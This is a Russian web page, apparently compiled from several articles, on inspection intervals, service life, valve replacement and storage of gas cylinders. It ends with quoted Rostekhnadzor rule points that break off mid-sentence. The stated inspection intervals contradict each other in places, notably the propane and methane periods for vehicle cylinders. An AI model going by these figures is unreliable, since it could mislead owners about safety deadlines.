142 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Сроки освидетельствования баллонов с пропаном

Освидетельствование газовых баллонов

Для хранения и транспортирования сжатых и сжиженных газов применяют емкости, выполненные из металла или композитных материалов. Эти сосуды рассчитаны на то, что газ будет храниться в них под определенным давлением. Так, ГОСТ 15860-84 определяет, что рабочее давление в емкости с пропаном не должно превышать 1,6 МПа. Существуют и емкости, рассчитанные на более высокое давление в 5 МПа. Все емкости, применяемые для хранения газов должны проходить испытания и периодические освидетельствования.

Цель проведения испытаний и освидетельствования газового баллона – это контроль над его техническим состоянием и принятие решение о его дальнейшей эксплуатации или утилизации.

Поверка газового баллона

Освидетельствование газового баллона – это мероприятие, которое необходимо в первую очередь его владельцу. Освидетельствование может гарантировать то, что баллон безопасен в эксплуатации и может быть использован по назначению, в противном случае их эксплуатация недопустима. Существует единый порядок освидетельствования, во время ее проведения проводят осмотр поверхностей баллонов на предмет обнаружения повреждения поверхности.

Срок службы газового баллона

Выполняют проверку качества маркировки и окраски на предмет соответствия требованиям ГОСТ, состояния крана. Кроме того, в процессе аттестации проводят гидравлические испытания емкостей для хранения газов. Результаты осмотра и проведенных испытаний заносят в паспорт, сопровождающий изделие все время его эксплуатации.

Без проведения подобных мероприятий заправка и эксплуатации емкостей для хранения и перевозки газа недопустимы. Обследование баллонов и вынесение заключения по ним может выполнять только организация, которая имеет все необходимые разрешения и полномочия от соответствующих государственных надзорных органов.

Сосуды для хранения газов должны проходить аттестацию один раз в несколько лет. Срок проведения зависит от нескольких параметров – от материала, например, если баллоны изготовлены из легированной или углеродистой стали, то им достаточно проходить через эту процедуру один раз в пять лет. Баллоны, устанавливаемые на автомобили в составе ГБО, должны проходить аттестацию в три или пять лет.

Баллоны, которые работают в стационарных условиях и предназначены для хранения инертных газов проходят необходимые освидетельствования один раз в десять лет.

Обозначенные сроки освидетельствования должны строго соблюдаться. Все дело в безопасности. Если емкости предназначены для хранения и перевозки пропаном, ацетиленом или другим взрывоопасным газом любой дефект на наружной поверхности баллона может привести к непоправимым последствиям.

Как только возникают сомнения в работоспособности емкости для хранения газа необходимо вывести ее из оборота и приобрести, или арендовать новый.

Период допустимой эксплуатации

ГОСТ 949-73 определил то, что для баллонов, выполненных из стали и рабочим давлением до 19,6 МПа составляет 20 лет.

Период допустимой эксплуатации

Периодичность проведения проверки годности баллонов

Транспортировка и эксплуатация технических газов связано со значительной опасностью. Это обусловлено не столько их взрывоопасностью или воспламеняемостью, а, сколько наличием высокого давления в сосудах, предназначенных для их хранения и доставки к месту потребления.

При таких условиях даже самый незначительный дефект может оказаться причиной серьезного происшествия. Именно поэтому огромную роль играет своевременное освидетельствование и необходимое обслуживание баллонов.

Процесс освидетельствования и восстановления емкостей для промышленных газов

Нормативной документацией, а именно «Правилами обустройства и эксплуатации сосудов…» назначена регулярность проведения освидетельствования технического состояние сосудов для газов.

Правила использования ацетиленовых баллонов

К примеру, освидетельствование баллонов для ацетилена проводится один раз в пять лет. В то время, как масса, находящаяся внутри баллона, должна проверятся как минимум один раз в 2 года. Кстати, на баллоне должна быть нанесена отметка о сроках проведения освидетельствования, результате осмотра пористой массы и указаны сроки следующего освидетельствования баллона.

В соответствии с техническими условиями, к эксплуатации допускают только те емкости, которые прошли все необходимые испытания и об этом сделаны все соответствующие записи. Новые сосуды, проходят необходимый цикл испытаний во время приемки продукции службой технического контроля.

По истечении сроков освидетельствования баллоны должны проходить переосвидетельствование, то есть полное освидетельствование технического состояния. При этом те, которые переосвидетельствование не прошли должны быть изъяты из оборота и отправлены на вторичную переработку (утилизацию).

Емкости, на которых обнаружены исправимые дефекты, то они подлежат ремонту и после выполнения требуемых работ, проведения надлежащих испытаний могут быть возвращены в эксплуатацию.

Порядок проведения очередных испытаний баллонов

Очередные испытания баллонов проводят, руководствуясь РД 03112194-1094-03 и РД 03112194-1095-03. Сотрудники, которые выполняют такую работу, должны пройти соответствующие курсы и обладать надлежащими знаниями и навыками.

Очередные испытания проводят в следующей последовательности:

  1. Приемка емкостей. На этом этапе освидетельствования выполняется проверка комплектности баллона, выполняется осмотр внешней поверхности. Одновременно с этим выполняют проверку даты последнего осмотра и опрессовки. При необходимости должна быть выполнена очистка внутренней поверхности емкости.
  2. Обследование внутренней части емкости проводят с применением специализированного оборудования.
  3. Выполняют демонтаж арматуры и ее проверку. Кроме того, в процессе осмотра может быть выполнена установка технологических деталей, без которых невозможно провести гидравлические испытания.

После проведения гидравлических испытаний (опрессовки) необходимо просушить сосуд от следов реагента. Вернуть на место демонтированную арматуру.

Баллон необходимо подготовить к грунтовке и покраске. Для этого его подвергают пескоструйной обработке. После нанесения покрытия соответствующего цвета и ее просушки на поверхность баллона необходимо выполнить маркировку в соответствии с нормативной документацией. Окончание работ по освидетельствованию оформляется соответствующим актом. Общее время на выполнение всех указанных работ составляет 3 – 5 часов. В это время входят и подготовительные и основные операции.

Правила хранения

Баллоны, предназначаемые для технических газов, хранят на основании требований безопасности, которые определены в «Правилах эксплуатации сосудов под давлением ПБ 03-576-03».

В частности, весь рабочий и инженерно-технический персонал должен пройти должный теоретический и практический инструктаж. Сосуды, содержащие газ, хранят или в отдельных помещениях (зданиях), или допустимо их хранение и на открытом пространстве, но в этом случае, они должны быть ограждены от воздействия осадков и солнца.

Между тем хранить в одном помещении (здании) емкости с кислородом и горючими газами запрещено!

Емкости с газом могут быть установлены, для дальнейшей эксплуатации, не ближе чем на один метр к источникам тепла. Если для обогрева применяют открытый огонь, то расстояние до баллона не должно быть меньше 5 метров.

Виды и устройство вентилей

Несмотря на то, что все баллоны для хранения и перевозки газов отличаются друг от друга формой, цветом покрытия, объемом и многими другими характеристиками все они имеют одинаковое устройство. Баллон включает в свой состав – кран, бак и пр. Краны могут отличаться друг от друга конструктивными особенностями и материалами, которые были использованы для их производства. Кроме, их разделяют по типу применения – одни применяют для кислорода, другие для пропана, третьи для ацетилена. Соответственно на их поверхность наносят покрытия следующего типа:

Вентили газовых баллонов

Типовой газовый кран состоит из:

Корпуса, выполненного в виде тройника, состоящего из трех штуцеров, на каждом из них нарезана резьба. На некоторых моделях в корпус вмонтирован предохранительный клапан. Главная задача этого устройства стравливание излишнего давления, возникшего в баллоне.

Штуцера, расположенного внизу предназначенного для присоединения крана к емкости для хранения газа. К верхнему крепится регулирующих маховик (штурвал). К боковому штуцеру присоединяют внешние коммуникации или выполняют закачку газа. Корпус и основные детали выполняют из латуни или стали.

Краны, применяемые для негорючих газов, выполняют с правой резьбой на штуцерах, для тех, которые используют для горючих газов, нарезают левую.

Ремонт вентиля газового баллона

Основные неисправности газовых кранов

На самом деле конструкция газового крана не отличается сложностью и особо в нем ломаться нечему. Но и тем не менее в силу ряда причин, он может или начать пропускать газ или полностью выйти из строя. Одна из причин его поломок – это небрежное отношение со стороны персонала. Например, прикладывание излишних усилий при открывании или закрывании. Это может привести или к срыву резьбы или поломке штока.

Кроме этого, попадание в регулятор посторонних частиц может привести к тому, что они не дадут полностью закрыть затвор, а это неизбежно приведет к утечке газа. В любом случае при малейшем подозрении на наличие дефектов в корпусе или механизме газового крана, баллон необходимо изымать с рабочего места или бытового помещения и отправить его на ремонт.

Да, бесспорно, газовый кран, можно снять с баллона и самостоятельно его осмотреть и при необходимости его продуть или отремонтировать, но нельзя забывать о том, что любая работа с газовым баллоном несет в себе потенциальную опасность. Именно поэтому еден строгий запрет на демонтаж газовых кранов самостоятельно в кустарных условиях. Если есть даже небольшая возможность передать ремонт газового крана в мастерскую, то лучше так и сделать.

Меры предосторожности при замене

Замена вентиля на газовом баллоне должна проводиться с соблюдением определенных мер безопасности, среди них такие, как:

Замена вентиля газового баллона

  1. Удалить из сосуда остатки газа. Газ допустимо стравливать только на открытом пространстве. Исключение можно сделать только для азота, кислорода и ряда других.
  2. Рабочее место, на котором будут выполнять работы должно хорошо проветриваться.
  3. Маховик надо откручивать плавно и с небольшой скоростью.
  4. Замену вентиля можно выполнять только после уравнивания давления снаружи и в баллоне.

При установке вентиля на штатное место в баллоне необходимо использовать фум-ленту и другие типы герметиков, которые обеспечивают надежность соединения. Надо отметить, что уплотнители любого типа могут создавать определенные сложность при извлечении вентиля. Для облегчения этой задачи допустимо использовать строительный фен.

Выполнять нагрев арматуры, устанавливаемой на баллон допустимо только после стравливания содержимого емкости.

Пошаговая инструкция по замене вентиля

Новый регулировочный клапан не фиксируется к баллону на чистую резьбу. Обязательно необходимо применять уплотнительные материал: герметики или фум-ленту.

Проверка герметичности и завершение работ

По окончании работ по замене вентиля на газовом сосуде необходимо выполнить проверку герметичности вновь собранных соединений. Для этого используют способ, проверенный десятилетиями – нанесение мыльной пены.

Проверка герметичности и завершение работ

Если стыки собраны некачественно, то в месте утечки газа будут образовываться пузыри и поэтому нужно будет выполнить работу, по сборке по новой.

Зачем делать ремонт газового баллона

Делать или не делать ремонт газовых баллонов определяют на стадии их обследования. В процессе освидетельствования проводят осмотр внешней и внутренних полостей баллона.

Места для осмотра в газовых баллонах при проверки

Кроме того, осматривают состояние опорного башмака, если его состояние не в состоянии обеспечить вертикальную установку баллона, то эксплуатировать его недопустимо.

Виды ремонта газового баллона в частности, ремонт пропановых баллонов

Ремонт газовых баллонов выполняют на основании данных полученных при освидетельствовании в частности. В частности, при проведении восстановительно-ремонтных работ заменяют, вентили, заменяют башмак, выполняют ремонт горловины и пр.

Кроме того, разумеется, при необходимости, на поверхности сосуда наносят дополнительные надписи. Но надо всегда помнить о том, что иногда безопаснее приобрести новый баллон, чем продолжать эксплуатировать старый.

Чаще всего ремонту подлежат пропановые баллоны. Это связано в первую очередь с тем, что эти баллоны имеют широкое применение и в промышленности, и в быту. Но, владельцы бытовых баллонов, должны быть готовы к тому, что они ремонту не подлежат.

Внешние ддеффекты газового баллона для отбраковывания

Случаи, при которых газовые баллоны не обменивают и к дальнейшему использованию непригодны.

Если на поверхностях баллона выявлены дефекты поверхности, которые превышают 10% от площади поверхности, то такое оборудование ремонту не подлежит и, должно быть, утилизировано.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Освидетельствование баллона ГБО

Все владельцы транспортных средств, имеющие газобаллонное оборудование, обязаны в определенное время проходить освидетельствование баллонов. В соответствие с правилами Ростехнадзора, баллон должен проверяться на срок годности, на соответствие его требованиям безопасной эксплуатации, герметичности и прочности.

Освидетельствование баллона

Сроки освидетельствования баллона зависят от его наполнителя:

  • оборудование с метаном – если баллон произведен из легированной стали, 1 раз в 5 лет, если из стали, не имеющей легирующих добавок – 1 раз в 3 года;
  • оборудование с пропаном (смеси пропан-бутан) – 1 раз в 24 месяца.

В соответствие с Кодексом об административных нарушениях, а именно ч.1 пп. 12.5 и 7.14, запрещено эксплуатировать транспортное средство, имеющее газобаллонное оборудование, если на поверхности баллонов нанесенные данные не совпадают с данными, указанными в техническом паспорте. А также не нанесены сведения, касающиеся даты последней проверки и планируемой.

Первое, что необходимо сделать, это уточнить, вышел или нет срок годности сосуда, который установлен производителем. Данные сведения указаны на самом оборудование. Если со сроком годности все нормально, можно приступать к процедуре переосвидетельствования.

Если объем сосуда менее 100 л, дату очередного освидетельствования можно посмотреть на специальной табличке, она выполнена из металла и прикреплена к самому оборудованию. Если объем сосуда более 100 л, дата указана в приложении, выдающемся при установке самого баллона.

Как только даты были уточнены, можно приступать непосредственно к самой процедуре.

Процедура освидетельствования

Обращаясь к ПБ 03-576-03, в котором прописаны правила эксплуатации баллонов, находящихся под давлением, можно сделать вывод, что основное освидетельствование баллон состоит из аттестации, опрессовки и проверки оборудования.

Итак, процедура включает в себя выполнение следующих действий:

  • визуальный осмотр оборудования, проверка срока годности и даты следующего освидетельствования;
  • в некоторых случаях, если требуется, баллон снимают;
  • далее его очищаю от грязи, моют, стравливают газ;
  • затем проводится аттестация, которая заключается в исследовании на пригодность, соответствие всем нормам и стандартам, поиск дефектов;
  • если были обнаружены дефекты на поверхности, а именно коррозия, баллон зачищают, покрывают грунтовкой и красят;
  • опрессовка оборудования заключается в проведении испытаний на герметичность и прочность оборудования;
  • конечным этапом становится проверка баллона, а именно постановка клейма и занесения сведений в паспорт;
  • если производилось снятие баллона с транспортного средства, его устанавливают обратно.

Стоимость данных действий зависит от того, какие манипуляции будут проведены. В особенности, требуется ли снятие и установка оборудования, будут ли найдены дефекты и требуется ли их устранить и т.д.

Снятие системы с транспортного средства

Проверка и освидетельствование газобаллонного оборудования на транспортном средстве занимает срок до 2-х дней. Данный срок обусловлен тем, что требуется проведение технологических работ, а именно проведение испытаний на прочность и водонепроницаемость с дальнейшим принятием решения об эксплуатации.

После того, как баллон был снят, проверены все сроки годности, можно подготавливаться к процедуре аттестации.

Первое, с чего начинают – из баллона спускают газ и снимается запорная арматура. Для того, чтобы дальнейшие действия по проведению гидравлических испытаний были безопасны, при помощи специального аппарата проверяют, остался ли газ в баллоне или нет.

Аттестация оборудования

Основная задача аттестации заключается в проведении испытаний, направленных на соответствие оборудования всем нормам и стандартам.

Для начала тщательно осматривают наружную и внутреннюю поверхность оборудования. Все баллоны, на которых имеются дефекты, такие как сколы, коррозии и царапины, отсеиваются. Для последующей эксплуатации такие баллоны не пригодны.

Для того чтобы допустить оборудование до процесса опрессовки, оно должно соответствовать следующим значениям:

  • все дефекты должны иметь глубину не более 10% от самой стенки;
  • коррозия также должна быть не более 10% от всей поверхности;
  • если баллон соответствует выдвигаемым требованиям, он разрешен для дальнейшей эксплуатации.

Осуществлять аттестацию баллона можно, как метанового, так и пропанового. В первом случае действия проводят 1 раз в 24 месяца, во втором случае – 1 раз в 5 лет. Если сосуд с метаном изготовлен из углеродистой стали, переаттестация проводится 1 раз в 36 месяцев.

Если на оборудовании имеется коррозия, которая не препятствует дальнейшей работе сосуда на транспортном средстве, перед проведением процедуры по опрессовке, требуется предварительно подготовить баллон.

Для начала проводится зачистка и покрытие грунтовкой сосуда. После этого можно приступать к нанесению краски и технической надписи.

Опрессовка ГБО

Опрессовка предназначена для выявления водонепроницаемости и прочности газобаллонного оборудования.

Если говорить о методах проведения данной процедуры, испытания проводят воздухом и водой.

Испытание водой заключается в том, что для начала из сосуда откачивается весь имеющийся воздух и его заполняют водой. Подают на сосуд давление. Таким образом, можно определить герметичность. В конце сосуд просушивают.

Испытание воздухом заключается в том, что сосуд погружают в воду и проверяют при помощи инертного газа или сжатым воздухом. В соответствие со стандартами, один газ может быть заменен на другой. Суть такая же, как и при испытании водой – проверить на герметичность.

Если процедура опрессовки ГБО прошла успешно, оборудование пригодно для установки на транспортное средство и дальнейшей эксплуатации. Баллон следует передать на проверку, где поставят клеймо и внесут данные в паспорт.

Проверка системы

Проверка метанового и пропанового оборудования является подтверждением того, что сосуд полностью соответствует всем требованиям по безопасной эксплуатации.

Как только были проведены испытания водой и воздухом, все данные вносятся в паспорт. В документе указано разрешение на допуск и дальнейшую эксплуатацию.

  • свидетельство о том, что ГБО прошло все испытания;
  • в паспорте ставится отметка об очередном переосвидетельствовании.

В документах, которые прилагаются к газобаллонному оборудованию на транспортное средство, указывается, что сосуд был подвергнут не только наружному и внешнему осмотру, но и прошел все испытания. В результате всех проведенных действий выдается заключение о пригодности баллона для работы.

Данный результат, а именно свидетельство по форме 2Б должно всегда находиться в транспортном средстве. Его могут потребовать сотрудники ГИБДД, оно необходимо при прохождении технического обслуживания автомобиля и при выдаче диагностической карты. Также некоторые заправки требуют акт проверки оборудования.

Последние переведённые на газ автомобили

С 1996 года установили газовое оборудование на 40 000 автомобилей в сервисных центрах в Москве и Санкт-Петербурге. См. фото техзоны сервиса

Срок годности газового баллона и газа в нем

Газовые баллоны постоянно находятся в обороте и часто подвергаются такелажу — их грузят на автотранспорт, везут к месту заправки и снова транспортируют к пункту использования.

Эти сосуды содержат газовые смеси, являющиеся пожаро- или взрывоопасными. Каков срок годности газовых баллонов, есть ли способы установить это?

Дорогие читатели! Наши статьи рассказывают о типовых способах решения юридических вопросов, но каждый случай носит уникальный характер.

Если вы хотите узнать, как решить именно Вашу проблему — обращайтесь в форму онлайн-консультанта справа или звоните по телефонам бесплатной консультации :

О сроке годности защитной каски для рабочего узнайте из нашей статьи.

Есть ли он?

Как узнать срок годности газового баллона?

Газовые баллоны, внутри которых создается избыточное давление, должны подвергаться проверкам на пригодность.

Срок годности устанавливается заводом-изготовителем, и важно знать, что сверх этого срока использование газовых емкостей недопустимо.

Приказом Ростехнадзора от 25.03.2014 г. №116 утверждены Правила безопасности опасных производственных объектов, где применяется оборудование, работающее под давлением. Пункт 485 этих Правил… как раз и запрещает сверхнормативную службу этих емкостей.

Действительно, срок годности баллонов составляет 40 лет, но не всех. Каждый из видов таких емкостей изготавливается в строгом следовании требованиям ГОСТов.

О чем говорят ГОСТы?

ГОСТ 15860 регламентирует изготовление такого оборудования: «Баллоны стальные сварные для сжиженных углеводородных газов на давление до 1,6 МПа».

В этом нормативном документе установлен срок эксплуатации емкостей — 40 л., но с условием соблюдения правил эксплуатации и обязательного технического освидетельствования один раз в 5 лет.

К примеру, баллоны алюминиевые БД производятся не по ГОСТ, а по ТУ, но есть сертификат разрешение на использование.

Срок годности определить сложно.

Наиболее распространенный вид сосудов (стальных), производимых по ГОСТ 949-73 и применяемых для газовых сред, имеет гарантийный срок эксплуатации (с даты ввода в действие) — 2 года, именно такой период упомянут в п.6.2 ГОСТа.

Однако не стоит путать сроки гарантийный и эксплуатационный, продолжительность которого составляет 20 лет.

ГОСТ Р ИСО 11439-2010 на сосуды для заправки (в качестве топлива) транспорта в п. 4.3.1 указывает, что право устанавливать продолжительность периода годности предоставляется производителю, но эта продолжительность для подобного оборудования не должна превышать 20-ти лет.

Сроки службы, установленные изготовителями

О том, что устанавливать срок эксплуатации газовых баллонов должен именно изготовитель, сказано и в п. 485 Приказа Ростехнадзора №116. Здесь же рекомендовано устанавливать срок годности 20 лет, если какие-либо сведения в сопроводительной документации отсутствуют.

  1. Металлокомпозитные МКБ и БМК. Производитель определил срок годности металлокомпозитных МКБ и БМК в период, равный 10-ти годам.
  2. Челябинский трубопрокатный завод. Этот изготовитель работает с продукцией по ГОСТ 949-73. Есть разница в оборудовании, произведенном до 22.12.2014г., и после.

Дело в том, что на баллонах, изготовленных до этой даты, маркировка относительно срока службы отсутствовала, в соответствии с МТО 14-3Р-001-2002г. Принято при обнаружении газовых емкостей с не указанным периодом действия считать, что их срок годности составляет 40 лет. Срок эксплуатации оборудования, выпущенного после 22.12.2014 г., устанавливается заводом-изготовителем продолжительностью в 20 лет.

  • Алюминиевые БД: На такие сосуды ГОСТа нет, а в ТУ срок годности не указан. Зато изготовители утверждают, что длительность эксплуатации алюминиевых сосудов для газов составляет:
    • 10 лет, если сосуды изготовлены до ноября 2014 г.;
    • 20 лет, при условии выпуска после ноября 2014г.

    Разница в продолжительности эксплуатации состоит в новом, более строгом подходе, базируемом на усилении требований норм безопасности.

    Сколько хранится газ?

    Разные газы могут храниться в сосудах разное количество времени.

  1. Пропан-бутан сохраняет свои свойства неопределенное количество времени. Главное условие — чтобы сохранялся минимальный уровень рабочего давления. Пропан-бутаном можно пользоваться, пока не закончится содержимое баллона.
  2. Производителем срок хранения кислорода в баллоне определен в 18 мес. с дня приготовления продукта.
  3. Ацетилен считается газом, наиболее взрывоопасным и сложным в обращении. В баллонах ацетилен может содержаться достаточно долго, но предприятие, работающее с этим веществом, обязано перед проведением сварочных работ проводить проверки веса и пористости, в случае, если эти показатели не соответствуют нормативам, работа с содержимым сосуда невозможна.
  4. Чистый аргон допустимо хранить 18 мес.
  5. В баллонах водород разрешено держать 3 года.
  6. В баллонах хранят и азот. Этот газ допускается использовать при содержании в баллоне на протяжении 18 мес.

О сроке годности и правилах хранения аккумуляторных батареек читайте здесь.

Как определить у баллона на 50 литров?

Вся информация находится прямо на верхнем торце газовой емкости. На 50-литровой емкости наносят разные сведения, в том числе и три группы цифр, обозначающих месяц и год изготовления, а следующая группа — время первой переаттестации (внеочередное испытание проводится после ремонта и не может быть предугадано изготовителем).

Между этими датами промежуток, равный 5 годам, именно через такое время и планируют периодические испытания. Результаты последующих испытаний должны выбиваться прямо на теле верха сосуда.

В настоящее время год выпуска, чтобы облегчить задачу пользователям, наносят на корпус краской: 08 — 2008 год, 11 — 2011 год и т.п. Согласно п. 22 новых Правил…, расчетный срок службы с даты изготовления должен вноситься в паспорт, а для баллона паспортом и есть металлическая пластина с выбитыми на ней сведениями.

О нюансах пропановых баллонов в этом видео:

Период допустимой эксплуатации

Между промышленными и бытовыми сосудами для хранения газов никакой разницы нет, это те же самые емкости.

Баллоны для промышленных нужд должны содержаться в условиях, отвечающих требованиям правил безопасной эксплуатации, аналогично бытовым сосудам.

Единственная разница — в промышленности не пользуются емкостями с малыми объемами. Срок эксплуатации бытового и промышленного газового баллона одинаков.

Есть ли срок годности у бензина и солярки? Ответ узнайте прямо сейчас.

Переосвидетельствование

Каждый вид газовых баллонов имеет свои сроки переосвидетельствования, установленные Госгортехнадзором. Газовые среды обладают разными свойствами и в разной степени агрессивны по отношению к корпусу сосуда.

Предприятие, проводящее первое переосвидетельствование, выбивает на верхней части корпуса в формате «R-АА», где R- клеймо предприятия, АА — дата очередного испытания.

Сроки между техническим освидетельствованием баллонов стальных таковы:

  • пропановых — 5 лет;
  • автомобильных — 2 года;
  • аргоновых — 5 лет;
  • кислородных — 5 лет;
  • установленных стационарно, с большой емкостью — 10 лет.

Важно знать, что металлокомпозитные МКБ и БМК емкости в переосвидетельствовании не нуждаются вовсе, полный срок в 10 лет — их время жизнедеятельности.

Правила… устанавливают такую периодичность проверки сосудов под давлением при скорости разрушения:

  • не более 0,1 мм/год — 2 года;
  • более 0,1 мм/год — 5 лет.

Стоит положиться на профессионализм специалистов из компаний, имеющих лицензию и клеймо на проведение освидетельствования баллонов, и ориентироваться на сроки, установленными ими.

Правила хранения

Баллоны с кислородом и с горючими газами — со сжиженным газом, ацетиленом и пр. горючими газовыми смесями необходимо хранить раздельно, то есть в отдельных помещениях, во избежание взрыва и пожара.

Важно знать, что кислород чувствителен к теплу, поэтому сосуды с этим газом должны находиться от источников тепла не менее чем в 5 м.

К дальнейшему использованию непригодны

Почему баллоны, отработавшие нормативный срок службы, но прошедшие техническое освидетельствование, не должны приниматься к заправке?

Согласно п. 485 Правил…, даже успешно прошедшие техническую проверку сосуды для газов, отслужившие нормативный период, к дальнейшему использованию непригодны.

В этом же пункте говорится, что при обнаружении случаев проведения успешного переосвидетельствования после ноября 2014 г. емкости, у которой срок службы истек, следует эти результаты аннулировать, так как по новым Правилам. проведение экспертизы баллонов за пределами их сроков эксплуатации запрещается.

Израсходовавший свой прочностной ресурс материал способен в любой момент разрушиться.

Все эти меры и более жесткие правила направлены на усиление безопасности эксплуатации газовых емкостей, в которых содержимое находится под давлением.

Это вызвано участившимися случаями применения баллонов с давно истекшим сроком службы и, как результат, возникновения несчастных случаев.

Сопротивляться требованиям этих Правил… — значит, поставить под угрозу не только свое здоровье и жизнь, но и жизни других людей, что не только неразумно, но и преступно.

Каким требованиям должны соответствовать газовые баллоны, как правильно использовать, что такое освидетельствование и какую процедуру проходят баллоны на газонаполнительной станции? Об этом в видео:

Не нашли ответа на свой вопрос? Узнайте, как решить именно Вашу проблему — позвоните прямо сейчас:


Это быстро и бесплатно !

Освидетельствование баллонов

486. Освидетельствование (испытание) баллонов проводят организации-изготовители, а также уполномоченные в установленном порядке специализированные организации, имеющие наполнительные станции (пункты наполнения) и (или) испытательные пункты (пункты проверки) при наличии у них:

а) производственных помещений, в соответствии с проектом, разработанным специализированной организацией, а также технических средств, обеспечивающих возможность проведения освидетельствования баллонов в полном соответствии с методиками разработчика проекта конструкции и (или) изготовителя конкретного типа баллонов;

б) назначенных приказом лиц, ответственных за проведение освидетельствования, из числа специалистов, аттестованных в установленном порядке, и рабочих соответствующей квалификации;

в) клейма с индивидуальным шифром;

г) производственной инструкции по проведению технического освидетельствования баллонов, устанавливающей объем и порядок проведения работ, составленной на основании методик разработчика проекта конструкции баллона.

487. Шифр клейма присваивает территориальный орган Ростехнадзора и иной федеральный орган исполнительной власти в области промышленной безопасности (для подведомственных иному федеральному органу исполнительной власти в области промышленной безопасности организаций) по результатам проверки соответствия испытательного пункта требованиям настоящих ФНП, проводимой на основании письменного обращения организации, планирующей осуществлять деятельность по освидетельствованию баллонов. Организация, планирующая осуществлять деятельность по освидетельствованию баллонов, представляет заявление о присвоении шифра клейма с указанием в нем сведений об организационно-технической готовности к данному виду деятельности в соответствии с требованиями настоящих ФНП, с указанием характеристик баллонов, освидетельствование которых готова осуществлять организация (тип или марка баллонов, вместимость баллонов, наименование и назначение газов, для которых они предназначены).

488. В организациях, осуществляющих освидетельствование баллонов, должно быть обеспечено ведение журнала учета выдачи и возвращения клейм с шифрами специалистам, которым поручено проведение освидетельствования баллонов. Клеймо с шифром выдается лицу, прошедшему подготовку и аттестацию по промышленной безопасности в установленном порядке и назначенному приказом (распоряжением) руководителя организации для проведения освидетельствования баллонов. Клейма одного шифра закрепляются за одним лицом на все время выполнения им освидетельствования баллонов. Разовые или временные передачи клейм для клеймения баллонов другим лицам без соответствующего приказа (распоряжения) руководителя организации (индивидуального предпринимателя) не допускаются. Порядок, обеспечивающий сохранность клейм и журнала учета выдачи и возвращения клейм с шифрами, определяется приказом руководителя организации (индивидуального предпринимателя).

489. При прекращении организацией (индивидуальным предпринимателем) освидетельствования баллонов оставшиеся клейма с шифрами уничтожаются организацией (индивидуальным предпринимателем) по акту, один экземпляр которого представляется в Ростехнадзор, присвоивший шифр клейма.

490. Шифры клейм должны состоят из цифровой части — арабских цифр в виде чисел от 01 до 98 и буквенной части с применением заглавных букв русского алфавита (кроме букв «З», «Ё», «Й», «О», «Х», «Ч», «Ъ», «Ы», «Ь»), а также заглавных букв латинского алфавита «F», «L», «N», «R», «S», «U», «V», «W», «Z». Шифр клейма имеет три знака одного размера (высотой 6 мм), располагаемые в ряд в круге диаметром 12 мм, и состоит из двух цифр (цифровая часть шифра) и одной заглавной буквы (буквенная часть шифра). Включение в шифр каких-либо других знаков (в том числе тире, точек), дробное расположение их или применение непредусмотренных шифров, а также перестановку цифр местами (например, замена цифровой части шифра 12 числом 21) не допускают. Для выбраковки баллонов в организациях должны быть использованы клейма круглой формы диаметром 12 мм с буквой «X». Место нанесения браковочного клейма «X» — справа от номера баллона на расстоянии не более 10 мм.

Шифры клейм, присваиваемые организации, планирующей осуществлять деятельность по освидетельствованию баллонов, подведомственной иному федеральному органу исполнительной власти в области промышленной безопасности, должны включать буквенную часть из двух заглавных букв русского и латинского алфавита (например — «MW») и цифровую часть из цифр от 1 до 9 (пример шифра: MW1), выделяемые Ростехнадзором индивидуально конкретному органу исполнительной власти в области промышленной безопасности.

491. Распределение (закрепление) цифровых, буквенно-цифровых и буквенных частей шифров клейм по территориальным органам Ростехнадзора и иным федеральным органам исполнительной власти в области промышленной безопасности производит Ростехнадзор. Территориальный орган Ростехнадзора для каждой организации или иной федеральный орган исполнительной власти в области промышленной безопасности для каждой подведомственной организации устанавливает индивидуальный шифр клейма и ведет учет присвоенных шифров в журнале учета шифров клейм в едином реестре шифров клейм, имеющих обращение на территории Российской Федерации.

492. Контроль за соблюдением требований настоящих ФНП при проведении технического освидетельствования, ремонта и наполнения баллонов, в целях обеспечения промышленной безопасности и уменьшения риска аварий (взрывов) баллонов, применяемых на территории Российской Федерации, осуществляется Ростехнадзором в рамках установленных Правительством Российской Федерации полномочий по надзору за соблюдением требований промышленной безопасности при обслуживании и ремонте технических устройств, применяемых на опасных производственных объектах, проведением проверок в соответствии с положениями законодательства в области защиты прав юридических лиц и индивидуальных предпринимателей при осуществлении государственного контроля (надзора) и муниципального контроля.

493. Освидетельствование баллонов, за исключением баллонов для растворенного под давлением ацетилена (далее — ацетилена), включает:

а) осмотр внутренней (за исключением баллонов для сжиженного углеводородного газа (пропан-бутана) вместимостью до 55 литров) и наружной поверхностей баллонов;

б) проверку массы и вместимости баллонов;

в) гидравлическое испытание баллонов.

Проверку массы и вместимости стальных бесшовных баллонов до 12 литров включительно и свыше 55 литров, а также сварных баллонов независимо от вместимости не производят.

Для баллонов, оборудованных запорно-предохранительными устройствами (ЗПУ), предохранительными клапанами, мембранными предохранительными устройствами (МПУ), по истечении срока службы ЗПУ, предохранительного клапана, МПУ должно проводиться внеочередное освидетельствование с заменой отработавших срок службы ЗПУ, предохранительного клапана, МПУ.

494. При удовлетворительных результатах организация, в которой проведено освидетельствование, выбивает (наносит) на баллоне свое клеймо круглой формы диаметром 12 мм, дату проведенного и следующего освидетельствования (в одной строке с клеймом).

Результаты технического освидетельствования баллонов вместимостью более 100 литров заносят в паспорт баллона. В этом случае клейма на баллонах не ставят.

495. Результаты освидетельствования баллонов, за исключением баллонов для ацетилена, записывает лицо, освидетельствовавшее баллоны, в журнал испытаний, имеющий, в частности, следующие графы:

а) товарный знак или наименование изготовителя;

б) номер баллона;

в) дата (месяц, год) изготовления баллона;

г) дата произведенного и следующего освидетельствования;

д) масса, выбитая на баллоне, кг;

е) масса баллона, установленная при освидетельствовании, кг;

ж) вместимость баллона, выбитая на баллоне, литры;

з) вместимость баллона, определенная при освидетельствовании, литры;

и) рабочее давление, МПа;

к) отметка о пригодности баллона;

л) фамилия, инициалы и подпись представителя организации (индивидуального предпринимателя), проводившей освидетельствование;

м) информация о собственнике баллона.

496. Освидетельствование баллонов для ацетилена должно быть произведено на ацетиленовых наполнительных станциях в сроки, установленные изготовителем (но не реже чем через 5 лет), и включает:

а) осмотр наружной поверхности;

б) проверку пористой массы;

в) пневматическое испытание.

497. Состояние пористой массы в баллонах для растворенного ацетилена должно проверяться на ацетиленовых наполнительных станциях не реже чем через 24 месяца.

При удовлетворительном состоянии пористой массы на каждом баллоне должны быть выбиты:

